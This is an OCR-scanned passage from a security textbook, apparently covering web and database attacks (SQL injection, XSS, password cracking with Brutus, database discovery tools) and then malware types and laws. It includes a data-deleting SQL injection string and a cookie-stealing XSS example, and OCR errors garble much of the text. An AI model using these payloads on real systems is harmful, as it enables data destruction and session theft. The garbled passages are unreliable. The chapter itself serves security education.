• Lack of input validation

• The environment and platform affected can be:

■ Language — SQL

■ Platform — Any

SQL injections are common and serious issues with any Web site that uses a database
as its brick end. Those with the correcl know led tit 1 can easily lieleet and exploh Iknv.s,
Since a large of Web sites use databases as their back end to provide a rich experience
to the visitor the potential for a Web site to be effected by this attack is possible on even
small-scale sites.

Essentially an SQL in lection Is carried out by placing special characters into existing
SQL commands and modifying the behavior to achieve the attacker’s desired result.

NOTE

Structured Query Language (SQL)

is a language used to interact
with databases. Using SQL it is
possible to access, manipulate
and change data in databases to
differing degrees. The language
is not designed for any specific
vendor’s database, though some
customization, and is commonly
used in large database systems.

NOTE

To be effective, an SQL injection
does require a level of knowledge
and comfort with the SQL language,
However, browsers such as Mozilla
Firefox do offer add-ons that make
the level of knowledge less than
it used to be. Other plugins that
are available can assist in the
process of locating weaknesses
in a Web site or Web application
giving the attacker the ability
to target their attack.

218 PART 2 A Technical Overview of Hacking

The following example illustrates an SQL injection in action and how it is carried out.
This example also illustrates the impact of introducing different values into an SQL query.

In the following example, after an attacker with the usernamc
”kirk M inputs the string 1 name” ; DELETE FROM items;— “for
item Name, then the query becomes the following two queries:

SELECT T FROM items
WHERE owner = ‘kirk’
AND itemname = * name ‘ ;
DELETE FROM items; — ‘

Several of the well known database products such as Microsoft’s
SOI. Server and Seine! allow multiple SQL statements separated
by semicolons to be executed at once. This technique is formally
known as batch execution and allows an attacker to execute
multiple arbitrary commands attains! a daiabase. In other
databases this technique will generate an error and fail,
so knowing the database you are attacking is essential.
If an attacker enters the string ‘name’ ; DELETE FROM items; SELECT * FROM items
WHERE ‘ a ‘ = * a ‘ ; . the following three valid statements will be created:

SELECT * FROM items

WHERE owner = r kirk’

AMD itemname = ‘name’ ;

DELETE FROM items ;

SELECT * FROM items WHERE ‘a’-‘a 1 ;

A good way to prevent SQL injection attacks is to use input validation, which ensures
that only approved characters are accepted. Use whitelists, w r hich dictate safe characters,
and blacklists, which dictate unsafe characters.

Vandalizing Web Servers

Web servers are the targets of numerous types of attacks, but one of the most common
attacks is the act of vandalism known as defacement. Defacing a Web site can be aggressive
or very subtle, depending on the goals of the attacker, but in either case the goals are the
same: to embarrass the company, make a statement, or just be a nuisance. In order to
actually deface a Web site, it is possible to use a number of methods, depending on the
attacker’s own skill level, capabilities, and opportunities available. Any of the following
methods may be used:

1

(|>TIP

Take special note of the last
two characters, which are two
hyphens (- -}. These characters are
significant as they tell the database
to treat everything following as
a comment and therefore not
executable. In the event that this
query was modified,, anything in
the original query following the
hyphens would now be ignored
and everything p?ior would be
executed.

CHAPTER 9 Web and Database Attacks

219

• Cr eden tials th rou g h m ei n -in -th e- m iddle art a c ks

• FTP server exploits

• Web server bugs

• Web folders

• I nco rre c tly ass igned or configured per m issio n s

• SQL injection
I KL poisoning

• We b ser ver exte n sion ex plo it s

• Rem ote ser vice exploi 1 s

• Let’s take a look at some of the more common ways of attacking a Web server and
the sites hosted on them.

Input Validation

Developers of Web applications have traditionally been less than careful regarding the
type of input Ibey will accept. In most cases, a user entering data into n I’orm or Web site
will have few if any restrictions placed up on them when he or she enters data. When
data is accepted without restriction, mistakes both intentional and unintentional will
be entered into the system and can lead to problems later on, such as the following:

• System crashes
• Database manipulation

• Database corruption

• Buffer overflows

• Inconsistent data

• A good example of input validation, or rather the lack of it,
is a box on a form where a phone number is to be entered,
but actually any form of data will be accepted. In some cases,
taking the wrong data will simply mean that the information
may be unusable to the owner of the site* but it could cause the
site to crash or mishandle the information to reveal information
onscreen.

Cross-Site Scripting (XSS)

Another type of attack against a Web server is the cross-site scripting (XSS) attack. It relies
on a variation of the input validation attack* but the target is different because the goal
is to go after a user instead of the application or data. An example of a XSS uses scripting
methods to execute a Trojan with a target’s Web browser; this would be made possible
through the use of scripting Languages such as JavaScript or VBScript. By careful analysis,
an attacker can look for ways la inject malicious code into Web pages in order io gain
information from session info on the browser, to elevated access, to content in the browser.

NOTE

data you are expecting in an
application, (such as a form) and
make sure that this is the only
type of data that is accepted.

220 PA RT 2 A Tech n i ea I Overview of H ack i n g

XSS in Action

1. The attacker discovers that the HYRULE Web site suffers from a XSS scripting defect.
• An attacker sends an e-mail stating that the victim has just been awarded a prize
and should collect it by clicking a link in the e-mail.

• The link in the e-mail goes to http://www.hyruIe.com/dBfault.3sp7namEs

• When the link is clicked, the Web site displays the message “Welcome Back! ”
with a prompt to enter the name.

• The Web site has been read the name from your browser via the link in the e-mail.
When the link was clicked in the e-mail r the HYRULE Web site was told your name
is <script>evi I Script ()</script>.

• The Web server reports the “name” and returns it to the victim’s browser.

• The browser correctly interprets this as script and runs the script.

• This script nstructs the browser to send a cookie containing some information
to the attacker’s system, which it does.

• Most modern Web browsers contain protection, against XSS, but this does not mean
the user is entirely safe.

Anatomy of Web Applications

Web applications have become more popular in recent years, with companies deploying
more of this class of software application. Applications such as Microsoft ShiircPoim .
Moodle h and others have been deployed for all sorts of reasons, ranging from organization
of tin hi Lo simplilied customer access. Appllrul ions in l his cmegory Eire typically ik-siiiiu-u
to be accessed from a Web browser or similar client application that uses the HTTP
protocol to exchange information between the client and server

Software in this category can be written in any number of development languages,
including Java or ActiveX. Web applications can be constructed with a variety of appli-
cation platform s h such as BE A Web logic, ColdFusion, IBM WebSphere, Microsoft .NET,
and Sun JAVA technologies.

Exploitative behaviors:

• Theft of information such as credit cards or other sensitive data
• The ability to update application and site content

• Server-side scripting exploits

• Buffer overflows

• Domain Name Server (DNS) attacks

• Destruction of data

• CHAPTER 9 Web and Database Attacks

Making Web applications even more of a concern to the security professional is the fact
that many Web applications are dependent on a database. Web appiicalions will hold
information such as configu ration information, business rules and logic, and customer
data. Using attacks such as SQL injections, an attacker can compromise a Web application
<uu1 i lien reveal or mmiipukue daua in ivays that an owner ma\ not have envisioned,
much less intended.

Common vulnerabilities with Web applications tend to be somewhat specific to the
environment, including factors sueh as operating system, Explication, and user base.
With all these factors in mind, it can be said that Web application vulnerabilities can
be roughly confined to the following categories:

• Authentication issues
• Authorization configuration

• Session management issues

• Input validation

• Encryption strength and implementation

• Environment- specific problems

• Insecure Logon Systems

If ti Web application requires a user to log on prior to gaining access to the information
in an application, this logon must be handled securely. An application that handles logons
must be designed to properly handle invalid logons and passwords. Care must be taken
that the incorrect or improper entry of information does not reveal information that an
attacker could use to gain additional information about a system. An example of this
situation is shown in Figure 9- ] .

Applications can track Information relating to improper or incorrect logons by users if
so enabled, Typically, this information comes in log form with entries listing items such iis:

• Entry of an invalid user ID with a valid password
• Entry of an valid user ID with an invalid password

• Entry of an invalid user ID and password

• Applications should be designed to return very generic information that does not
reveal information such as correct usernames. W f eb apps that return message such as
“uscrnnme invalid” or “password invalid” can give an attacker a target to focus on —

This user is not active.

Revealing error
message.

L_

222

PART 2 A Technical Overview of Hacking

One tool designed to uncover and crack passwords for Web applications and Web sites
is a utility known as Brutus. Brutus is not a new tooi but it does demonstrate one weapon
that the attacker has to uncover passwords for Web site and applications, Brutus is a
password cracker that is designed to decode different password types present in Web
applications. The utility is designed for use by the security professional for testing and
evaluation purposes, but an attacker can use it as welL

Brutus is as simple to use as are most tools in this category. The attack or cracking
process using Brutus proceeds as follows:

• Enter the IP address into the Target field in Brutus. This is the IP address
of the server on which the password is intended to be broken.
• Select the type of password crack to perform in the type field.

• • Brutus has the ability to crack passwords in HTTP, FTP, POP3, and NetBus.

» Enter the port over which to crack the password.

• Configure the Authentication Options for the system. If the system does not require

a username or uses only a password or PIN number, choose the Use User name option.

• For known user names, the Single User option may be used and the username
entered in the box below it.

• Set the Pass Mode and Pass File options.

• Brutus has the option to run the password crack against a dictionary word list.

• At this point, the p as s wo rd-crac king process can begin; once Brutus has cracked
the password, the Positive Authentication field will display it.

Again Brutus is not the newest password cracker in this category, but it is well known
and effective. Other crackers in this category include TllC Hydra.

Scripting Errors

Web applications, programs, and code such as Common G ate way Interface (CGI), ASP.NET.
and JavaServer Pages (JSP) are commonly in use in Web applications and present their own
issues. Using methods such as SQL injections and lack of input validation scripts can be a
liability if not managed or created correctly. A savvy attacker can use a number of methods
to cause grief to the administrator of a Web application, including the following:

of filling up the hard drive on the server. Once the hard drive of the server is filled,
the application will cease to function and crash.
• Poison null byte attack — A poison null byte attack passes special characters that
the scripts may not be designed to handle properly. When this is done, the script
may grant access where it should not otherwise be given.

• Default scripts — Default scripts are uploaded to servers by Web designers who
do not know what they do at a fundamental level. In such cases, an attacker can
analyze or exploit configuration issues with the scripts and gain unauthorized

CHAPTER 9 Web and Database Attacks

• Sample scripts — Web applications may include sample content and scripts that are
regularly left in place on servers. In such situations, these scripts, may be used by
an attacker to carry out mischief.

• Poorly written or questionable scripts — -Some scripts have appeared that include
information such as user names and passwords potentially letting an attacker view
the contents of the script and read these credentials.

Session Management Issues

A session represents the connection that a client has with the server application. The
session information that is maintained between client and server is important and can

Ideally a session will have a unique identilier, encryption, and other parameters
assigned every time a new connection between client and server is created. After the
session is exited, closed, or not needed, the information is discarded and not used again
(or at least not used for an extended period of time), but this is not always the case.

Some vulnerabilities of this type include:

» Long-lived sessions — Sessions between client and server should remain valid
only for the length they are needed and then discarded. Sessions that remain valid
for periods longer than they are needed allow attackers using attacks such as XSS
to retrieve session identifiers and reuse a session.

• Logout features — Applications should provide a logout feature that allows a visitor
to log out and close a session without closing the browser,

Insecure or weak session identifiers — Session IDs that are easily predicted or
guessed, so can be used by an attacker to retrieve or use sessions that should be
closed. Some flaws in Web applications can lead to the reuse of session IDs.

• Granting session IDs to unauthorized users — Sometimes applications grant session
IDs to unaulhenticated users and redirect them to a logout page. This can give the
attacker the ability to request valid URLs.

Poor or lack of password change controls — An improperly implemented or insecure
password change system h in which the old password is not required, allows a hacker
to change passwords of other users.

Inclusion of and unprotected information in cookies — Information such as the
interna! IP address of a server that can be used by a hacker to ascertain more Eiboul
the nature of the Web application.

Encryption Weaknesses

In Web applications, encryption plays a vital role because sensitive information is
frequently exchanged between client and server In the form of logons or other types
of information.

224 PART 2 A Technical Overview of Hacking

When working on securing Web applications, you must consider the safety of infor-
mation at two stages, when it is being stored and when it is transmitted. Both stages are
potential areas for attack and must be considered thoroughly by the security profession aL
When considering encryption Eind its impact on the application, the following are Eireas
of concern:

• Weak ciphers — Weak ciphers or encoding algorithms are those that use short keys
or are poorly designed and implemented. Use of such weak ciphers can allow an
attacker to decrypt data easily and gain unauthorized access to the information.
• Vulnerable software — Some software implementations that encrypt the trans-
mission of data, such as Secure Sockets Layer (SSL), may suffer from poor
programming, and as such become vulnerable to attacks such as buffer overflows.

• Some tools and resources are available that can help in assessing the security of Web
applications and their associated encryption slralegies:

• OpenSSL, an open source toolkit used to implement the SSLv 3 and TLS vJ protocols
• h t tp.7 / ww w. op n i ssl org

• The OWASP guide to common cryptographic flaws
■ h t fp.7 / ww w, owasp. o rgfasarJ cryptog raph id

• K ess us security scanner that can list the ciphers in use by a Web server

• httpifl ww w. nessus. o rg

• WinSSLMiM can be used to perform n n II T TPS man-in- the- mid die attack.

• h ftp .7 / ww iv. seCUri tv u i fa. com Jou tils/ WinSSLMiM . sh tm I

• S tunnel, a program that allows the encryption of no n -SSL-aware protocols

• h f tp.7 / ww w. stunueL org

• Database Vulnerabilities

One of the most attractive targets for an attacker is the database
that contains the information about the site or application.
Databases represent that “holy grail” to an attacker due to
the information within in them: configuration information,
application data, and other data of all shapes and sizes.
An attacker that can locate a vulnerable database will find it
a very tempting target to go pursue and may very well do so.

The role of databases as the heart of a number of Web appli-
cations is well known and very common. Databases lie at the
heart of many well-known Web applications such as Microsoft’s
SharePoint and other similar technologies. In fact, a majority
of Web applications would not function without a database as
their back end.

NOTE

Databases of any type can be
vulnerable for any number of
reasons no matter how secure or
“unhackaible” the vendor espouses
them to be. Vulnerabilities will
vary depending on the particular
technology and deployment that
is In use, but in every case the
vulnerabilities are there.

CHAPTER 9 Web and Database Attacks

225

A Look at Databases

Tor alt its power and complexities, a database can be boiled down into a very simple
concept: It is a hierarchical, structured format for storing information for later retrieval
modification, management, and other purposes. The types of information that can
be stored within this format vary wildly* but the concept is still the same; storage
and retrieval,

In the datahase world databases are typically categorized based on how they store
their data, these organizational types are

• Relational database — With a relational datEiba.se. data can be organized and
accessed in different ways as appropriate for the situation. For example, a data set
containing all the customer orders in a can be grouped by the Zip code in which the
transaction occur red, by the sale price, by the buyer’s company name, and so on.
• Distributed database — A distributed database is designed to be dispersed or
replicated between different locations across a network.

• Object-oriented programming database — An object-oriented programming
database is built around data -de lined object classes and subclasses.

Within a database there are several structures designed to organize and structure infor-
mation. Each structure allows the data to be easily managed, queried, and retrieved:

• Record — Each record in a database represent a collection
of related data such information about a person.

Column — Represents one type of data, for example,
age data for each person in the database.

■ Row — One line of data in a database.

Iji order to work with the data in a database, a special language
is used. Structure Qiutv LniiLiimiv iSOLj is a standard language
for making interactive queries from and updating a database
such as IBM DB2; Microsoft Access: and database products from
Oracle, Sybase, and Computer Associates.

Databases have a broad range of applications for everything
from storing simple customer data to storing payment and
customer information. For example, in an e -commerce appli-
cation when customers place an order their payment and
address information will be stored within a database that
resides on a server.

While the function of databases may sound mundane,
databases really come into their own when linked into a Web
application. A database linked as part of a Web application can
make a Web site and its content much easier to maintain and
manage. For example, if you use a technology such as ASRNET,

NOTE

SQL was developed by IBM in
the early 1970s and has evolved
considerably since then. In fact,
SQL is the de facto language of
databases and is used by systems
such as Oracle, Siebel, Access^
and Microsoft SQL Server.

*

NOTE

While the database changes
from server to server and
application to application, the
actual concept is the same. The
finer details of every database
will not be discussed because
thfs would be impossible,, but
you can learn the broad details
that will apply to just about
every database.

226 P A RT 2 A Tech nical Overview of H ack i rig

NOTE

Of course^ the process of
to a Web application or page
is much more complex than
detailed here, but the process
Es essentially the same no
matter the technology.

you can modify a Web site’s content simply by editing a record in a
database. With l his linkage, simply changing u record in a database
will trigger a change in any associated pages or other areas.

Another very common use of databases, and one of the higher-
profile targets, is in membership or member registration sites. In
these types of sites, information about visitors who register with
the site is stored within a datEibcise. This can be used for a discussion
Ibrum. ehrit room, or iminv other applications. With polentially
large amounts of personal information being stored, an attacker
w T ould find this setup ideal for obtaining valuable information.
In essence, a database hosted on a Web server behaves as a database resident on
a computer, it is used to store, organize, and transmit data.

Vulnerabilities

Databases can have a myriad of vulnerabilities that leave them susceptible to attack.
These vulnerabilities are as varied as the environments the technologies are deployed into.

Vulnerabilities include misconfiguration, lack of training, buffer
overflows, forgotten options, and other details lurking in the
wings waiting for an attacker.

Before vou can uncover the vulnerabilities in databases it is

u

necessary to know what type and where your databases reside.
Databases can be easily missed because they may be installed as
part of another application or just not reported by the application
owner. For example, a product manufactured by Microsoft known
as SQL Server Express is a small, free piece of software that is part
of various applications that a typical user may install. As such,
this database may go unreported by users who are unaware
of the security issues involved.

NOTE

Network and security
of (or just don’t know a boot)
database servers on their
network. While larger databases
are more than likely to be on
ones that get bundled in with
other applications can easily
be overlooked.

Locating Databases on the Network

A tool that is very effective at locating these “rogue” or unknown installations is a tool
known as SQLPing 5.0. The description of this tool from the vendor’s Website describes
the product:

“SQLPing 3.0 performs both active and passive scans of your network in order to identify
all of the SQL Server/MSDE installations in your enterprise. Due to the proliferation of
personal firewalls, inconsistent network library configurations, and multiple-instance
support, SQL Server installations are becoming increasingly difficult to discover, assess,
and maintain. SQLPing 5.0 is designed to remedy this problem by combining all known
means of SQL Server/MSDE discovery into a single tool which can be used to ferret out
servers you never knew existed on your network so you can properly secure them. M

A sere en shot from SQLPing 3.0 is shown in Figure 9-2,

CHAPTER 9 Web and Database Attacks

227

Scan f w« Dvt A^i<fj j F fc

Mtpc ■ WHW.M^\nirily.iiini

“J

SWPAiHvH [:o« |1Q0 [iCO [m

I-

BognScon

J

J

PtdiiWi.Tro

i

iwvtr* Found

=1

1. ooi Dl Btve zoo. iqo. too. i?s iticiiH ui^v>u:i4 funtN:puiw»N

00:00:00 Scamuv? liutlKtO ”
00:04:00 <Ji«rU«.
00:00:00 led4 1 ur*ri

00.00.00 L&4d tl* p>iiwoi<li

00:0O:O0 hvnmg »V>ft : ZOO. 100, 100, 17*

M 00:91 S«cv«r: ZOO. 1QO. 100. 171 Fcr’-liJi Va*rV

00-00-01 lew CwlKl **

FIGURE 3-2

SQL Ping 3.0 interface.

A cousin of SQLFing is a product known eis SQLRecon. This product is very similar
lo S-OLPing* hut also employs additional techniques to discover SQL Server in stall Eit ions
that may be hidden:

‘SQLRecon performs both active and passive scans of your
network in order to identify all of the SQL Server /MSDE instal-
lations in your enterprise. Due to the proliferation of personal
firewalls, inconsistent network library configurations, and
multiple-instance support. SQL Server installations are
becoming increasingly difficult lo discover, assess, and maintain,
■SQLRecon is designed to remedy this problem by combining
all known means of SQL Server/MSDE discovery into a single
tool which can be used to ferret-out servers you never knew
existed on your network so you can properly secure them.”

Running a scan with either of these tools will give you infor-
mation about where you may have SQL Server installations
that you are u mi ware of.

| NOTE

Don’t get caught in the trap
of thinking that these tools
should be run only to detect
hidden servers when you suspect
that they exist, You should
consider periodically running
these tools, or similar ones, as
an audit mechanism to detect
servers that may pop up from
time to time.

228 PART 2 A Technical Overview of Hacking

NOTE

The tools discussed so far have
been targeted toward SQL Server,,
but other vendors have their
databases on the market, too.
If you need to crack passwords tn
some of these other technologies,
a good tool is Cain. This tool has
the ability to crack passwords of
databases such as those found
in SQLServer, MySQL, and Oracle

After a database has been located, the next step an attacker
can choose to take is to see whether the password can be broken.
A feature that is included in SQLPing3 .0 is a password-cracking
capability that can be used to target a database server and break
the product include the ability to use dictionary-based cracking

Locating Vulnerabilities in Databases

Every database is prone to its own types of vulnerabilities, but
there are some common ones that can be exploited using the
right tools. Some common vulnerabilities include:

• Unused stored procedures

• Services account privilege issues

• Weak or poor authentication methods enabled
• No [or limited) audit log settings

• Having knowledge of the database that you are using can go a Jong way toward thwarting
these problems, but other there are some other methods that can he used. One effective
method for uncovering problems is to consider the security problem from both an insider
and outsider’s perspective. Use tools and methods that an attacker that has no knowledge
of the system might use.

Two pieces of software that are useful for perform audits on databases are known as
NGSSquirrel and App Detective,

NGS Squirrel from NGS Software is a tool used to audit dattibcises to uncover vulner-
abilities. In NGS Software’s own words from its Web site:

“NGSSQuirreL for Oracle is our vulnerability assessment scanner
that sets the standard. Developed with the help of the highly experi-
enced NGSResearcb Team. It has been speciikally developed Ibr use
with Oracle DtunhLise Servers, allowing system administrators and
security professionals to expose potential vulnerabilities. More than
simply a scanner, it provides the capability to audit password quality,
rectify identified threats, and manage users and roles as well as
system and object privileges.”

NOTE

NGS Software offers versions
of this product for Oracle,
SQL Server, DB2, Sybase,
and Informix.

The other software mentioned is AppDetective. In the vendor’s own words:

“With a policy driven scanning engine, AppDetect i vePro identifies vulnerabilities
and mis configurations. Issues identified include default or weak passwords, missing
patches* poor access controls, and a host of other conditions. A flexible assessment
framework allows auditors to choose between an outside -in, ‘hackers eye view h of the
database which requires no credentials, or a more thorough inside-out scan which
is facilitated through a read-only database account.

CHAPTER 9 Web and Database Attacks

AppDetectivePro includes built-in templates to satisfy the requirements of security best
practices and various regulatory compliance initiatives. Compliance. 1 standards covered
include DLSA STIC, NLST 800-53 (FISMA), PCIDSS, HIPAA, GLBA, Sarbanes-Oxley,
LSO 2 700 1 , V.oim\ and Canada’s RUTS,

Out of Sight, Out of Mind

Protecting databases can be as simple as making sure their existence is not so obvious.
Keeping a database hidden from casual and even some aggressive scans by attackers
Is nol ;i ijil’licuh task ocean su L’lr tools art- quiu- often a l your linger Lips. !os1 Web servers,
Web applications, and the databases hosted in the environment include some security
features that can make a huge difference in protecting the database from would-be
attackers:

• Learn the provided security features in the database system — Protect the stability
of the database and its surrounding applications by evaluating the use of what

is known as process isolation. Process isolation provides extra protection against
catastrophic failure of a system by ensuring that one process crashing will not
take others with it.

Evaluate the use of nonstandard ports — Some applications must run on standard
ports such as 1433 for SQL Server. If your application does not require a specific port h
consider ch tinging 31 do one that is not commonly looked for or is unusual, making
an attacker have to do more work.

Keep up to date — Keep on top of the patches and service packs that are made
available for your system. Apply the patches where appropriate to ensure that you
do not become a victim of a bug or defect that has already been addressed.

• It’s as good as its foundation — The database doesn’t live on an island someplace
by itself; it is installed on an operating system. Ensure that the operating system
in use always has the latest patches and service packs installed.

• Use a firewall — Don’t fling a database into the void; use a firewall to protect it.
A good firewall can provide tremendous protection to a database server making
sure that too much information is never exposed,

230 PART 2 A Technical Overview of Hacking

SEE

CHAPTER SUMMARY

Today the public face of jusl about every organization is lis Web site, along with its
Web application and the features they oiler. Companies tend to host a wide variety of
content on the servers that their customers or potential customers will be interacting
with. A Web site being the first point of contact for customers is also something that
is an attractive target for an attacker With a well-placed attack, an individual with an
ax to yrind can embarrass a company by defacing its Web site or stealing information.

As a security professional, one of the tasks you are charged with is safeguarding this
asset and the infrastructure that is attached to it. Defending a Web server requires
special care and knowledge to make the information and content available, but at the
same time protect it from unnecessary exposure to threats, This task is trickier than
it sounds because a balance has to be struck between making the content accessible to
the appropriate audience while at the same lime ensuring that il is secure. In addition,
the Web server cannot be considered a standalone entity, because it will usually be
attached to the organization’s own network, meaning that threats against the server
can flow over into the company network as we Ik

Making the situation more complex is the I act that Web servers may not only
host regular Web pages but aiso Web applications and databases. More and more
organizations are looking to Web services such as streaming video and Web
applications such as SharePoint to make a more dynamic experience for their clients.
More organizations are hosting content such as databases online lor a wide range
of reasons. Each of these situations represents another detail that the security
professional must address properly to make sure that the server and the organization
are safe and secure.

WJ KEY CONCEPTS AND TERMS

Cross-site scripting (XSS)
Ports

Structured Query Language
(SQL)

CHAPTER 9 Web and Database Attacks

CHAPTER 9 ASSESSMENT

1 . validation is a rt.-s.ij It of SQL Injections.

A, True

B, False

1. Web applications are used to .

A, Allow dynamic content

B, Stream video
C Apply scripting
D, Security controls

1, Which i)]” the following challenges can be
solved by firewalls?

A, Protection against buffer overflows

II, Protection against scanning

l”. 1-[]J(jj cement ol pm iicges

\1 Ability to use nonstandard parts

4, Databases can be a victim of source code exploits.

A. True

B, False

1. The stability of a Web server does not depend
on the operating system,

A. True
li, False

1. are scripting languages..

A. ActiveX

B. Java

C. ecu

D. AS P. N ET

1. is used to audit databases,

A, Ping

B. IPConfig

C NCSSqulrrcl

S. Browsers do not display .

A. ActiveX

B. Hidden Holds

C. Java

L>, Javascript

1. can be caused by the exploitation

o\ defects and code.

A. Buffer overflows

B. SQL Injection

C. Buffer injection

D. Input validation

Malware, Worms, and Viruses

NE OF THE PROBLEMS in the technology business that has grown

U considerably over the years is the issue of malware. Malware in all
its forms has moved from being one of a simple annoyance to one
of downright maliciousness. Software in this category has evolved to the
point of being dangerous, as it now can steal passwords, personal information,
and plenty of other information from an unsuspecting user.

Malware is nothing new, even though the term may be. The problem
has existed for years under different names such as viruses, worms, adware,
sea re ware, and spy ware. But is has become easier to spread because of the
convenient distribution channel the Internet offers, as well as the increasingly
clever social-engineering methods the creators of this type of software employ.
Making the problem of malware even larger is the complexity of modern software,
lack of security, known vulnerabilities, and users’ lax attitude toward security

Malware or malicious code is not going to decline; in fact, the opposite is
true. One type of malware, Trojans with keyloggers, saw an increase of roughly
250 percent between January 2004 and May 2006, and such a trend represents
just one category. Some types of malware have seen even larger increases.

It is with these points in mind that this chapter will examine the problem
of malware, trends, and how to deal with the increasingly serious threat this
type of software poses.

Chapter 10 Topics

This chapter covers the following topics and concepts:

• What malware is
• What viruses are and how they function

• What worms are and how they function

• 232

■ What spyware is

• What scareware is

• Chapter 10 Goals

When you complete this chapter, you will be able to:

• List the common types of malware found in the wild
• Describe the threats posed by malware

• Describe the characteristics of malware

• Describe the threats posed by viruses

• Identify the different characteristics of malware

• Identify removal techniques and mitigation techniques for malware

• Malware

The lerm malware is often tossed around, but what exactly does
it mean? Mat ware refers to software that performs any action or
activity without the knowledge or consent of the system’s owner.
But the definition of malware can he expanded to include any
software that is inherently hostile, intrusive, or annoying in its
operation.

In the past, malware was designed to infect and disrupt, disable* or
even destroy systems and applications. In some cases this disruption
went one step further and used an infected system as a weapon
to disable or disrupt other systems. In recent years the nature of
malware has changed with the software seeking to remain out
of sight in an effort to evade detection and removal by the system
owner for as long as possible. All the while, the malware is resident
on a system taking up resources and power for whatever purpose
the attacking or infecting party may have in mind.

In the present day malware has changed in nature dramatically
with the criminal element realizing the advantages of using it
for more malicious purposes. In the past it was not uncommon
for malware to be written as a prank or to annoy the victim,

^ NOTE

Mat ware is a contraction for
the term malicious software,
which gives a much more
accurate picture of the goal
of this class of software.

[ NOTE

If the definition of malware
is limited to just software
that perforins actions without
the user’s knowledge or
consent this could include
a large amount of software
on the average system. It
is also important to classify
as malware software that is
hostile in nature,

233

234 PA RT 2 A Tech nical 0 vervie w of H ack i n g

rC

FY!

Increasing amounts of ma I ware have shown up over the past decade with the goal of making
some sort of financial gain for their creators. In the 1990s the idea of financial gain from such
software started in the form of dialers that would use a computer’s modem to call up numbers
such as adult services or other types to generate revenue. Over the last few years the tactics
have changed, however, with ma I ware tracking a person’s actions all the way to targeting ads
and other items on a victim’s system.

but times have changed, Malware in the current day has been adopted by
criminals for a wide array of purposes to capture information Eibout the victim
or commit other acts. As technology hus c\ olved, so has ma I ware — from the
annoying to the downright malicious.

The term mahvare used to cover just viruses, worms, Trojans, and other
similar software that performed no useful function or carried out malicious
activities, Mai ware has evolved to include new forms, such as spy ware, ad ware p
and scareware. Software that used to just dial up systems or be annoying now
on a system.

Another aspect of malware that has emerged is its use to steal information.
Malware programs have been know r n to install what is known as a key logger
on a system, The intention here is to capture keystrokes when entered with the
intention of gathering information such as credit card numbers, bank account
numbers, or other similar information. For example, malware has been used to
steal information from those engaging in online gaming to obtain players’ game
account information.

-i ™ »

Malware doesn’t necessarily hide from the user in every case; it depends on the intended
purpose of the creator. In some cases, spyware creators have stated their intentions outright by
presenting end user license agreements (EULAs) to the victim. Because most users never read
EULAs and the document looks legitimate, they tend to install the software without realizing
that the document may clear the attacker of responsibility.

I II

CHAPTER 10 Malware, Worms, and Viruses

235

Trie popular online game by Activision Blizzard known as World of Warcraft (WoW) has been
a target of multiple keyloggers since its debut. The intention with most keyloggers that have
targeted this game has been to capture what is known as an Authentication Code, used to
authenticate user accounts. When a victim is infected, the code is intercepted when entered and
a false code is sent to the WoW servers. The attackers get the real code at this point and can
now log onto the account directly while the victim is left out in the cold.

Malware’s Legality

iMalware has tested and defined legal boundaries since Lt came into being. Lawmakers
have passed statues specifically to deal with the problem. Mai ware initially was perceived
as being harmless, relegated to the status of a prank. But times changed — a more serious
look at the problem of malware became necessary. Over the past few years the problems
malicious code poses have been addressed technologically. In addition, new legal remedies
have emerged in several countries.

In the United States several laws have been introduced since the 1980s. Some of the
nit) re notable ones include:

The Computer Fraud and Abuse Act 1986 — This law was originally passed to
address federal computer-related offenses and the cracking of computer systems.
The act applies to cases that involve federal interests, or situations involving federal
government computers or those of financial institutions. Additionally the law
covers computer crime that crosses stEite lines or jurisdictions.

• The Patriot Act — This expanded on the powers already included in the Computer
Fraud and Abuse Act. The law:

• Provides penalties of up to 10 years for a iirst offense and 20 years for
a second offense
• A ssess es d a m ages over thee o u r se o f a yea r to muLli p] e s y ste m s to d e t e r m i n e
if such damages are more than $5,000 total • ( ™ h In 2009 Canada enacted the Electronic Commerce Protection Act (ECPA) r which was designed to meet the problem of malware head-on. The EC PA has several provisions for both spam and malware designed to limit the proliferation of the software both inside and outside Canada. The act introduces some steep fines of up to$10 million for an organization and $1 million for an individual for those installing unauthorized software on a system. 236 PA RT 2 A Tech n i ca I Overview of H atk i n g ■ Increases punishment for any violation that involves systems that process information relating to the justice system or military fovers damage Lo foreign computers involved in US interstate commerce • Includes, in calculating damages, the time and money spent investigating a crime • Makes selling computer systems infected with malware a federal offense. • Each country has approached the problem of malware a little differently, with penalties ranging from jail time lo potentially steep tines Tor violators. In the United States, states such as California, West Virginia, and ei host of others have put in place laws designed to punish malware perpetrators. While the laws have different penalties designed to address ma I ware’s effects, it has yet to be seen what the effects of these laws will be. Types of Malware While the term malware may refer to any software that fits the definition, it is also important to understand the specifics and significance of each piece of software under the malware banner A broad range of software types and categories exists, some of which have been around for a long time. Malware includes the following: • Viruses • Worms • Spy ware • Ad ware • Scare ware • Trojan horses • Rootkits • The latter two will be discussed in the next chapter Mai ware’s Targets A quick review of the targets of malware authors gives a good taste of why the problem is so serious: • Credit card data — Credit card data and personal information is a tempting and all too common target Upon obtaining this information an attacker can go on a shopping spree, purchasing any type of product or service: Web services, games, merchandise, or other products. • Passwords — Passwords are another attractive target for attackers. The compromise of this sort of information can be devastating to the victim. Most individuals will reuse passwords over and over again, and stealing a person’s password can easily open many doors to the attacker. Stealing passwords can allow a hacker to read passwords from a system that includes everything from e-mail and Internet accounts to banking passwords, • CHAPTER 10 Malware, Worms, and Viruses 237 Insider information — Confidential or insider information is another target for an attacker. An attacker may very well use malware to gain such information from an organization to gain a competitive or financial benefit. Data storage — In some cases a system infected with malware may find itself a point for storing data without the owners’ knowledge. Uploading data to an infected system can turn that system into a server hosting tiny type of content. This has included illegal music or movies, pirated software, pornography, financial data, or even child pornography. Viruses and How They Function A virus is one of the oldest pieces of software that fits under the definition of malware. It may also be one of the most frequently misunderstood. The term virus is frequently used to refer to all types of malware. Before getting too far into a discussion of viruses it is important to make clear first what a virus actually is and the behaviors viruses exhibit. A virus is a piece of code or software that spreads from system to system by attaching itself to other liles. When the file is accessed, the virus is activated. Once activated, the code carries out whatever attack or action the author wishes to execute, such as corrupting data or destroying it outright. Viruses have a long history, one that shows how this form of malware adapted and evolved as technology and detective techniques improved. Let’s examine the “btick story” of viruses, how they have changed with the times, and how this affects you as a security professional. Viruses: A History As stated earlier, viruses are nothing new; the first viruses debuted in the ” l wild H roughly 40 years ago as research projects. They have evolved dramatically since then into the malicious weapons they are today. The first recognized virus was created as a proof-of-concept application designed in 1971 to demonstrate what was 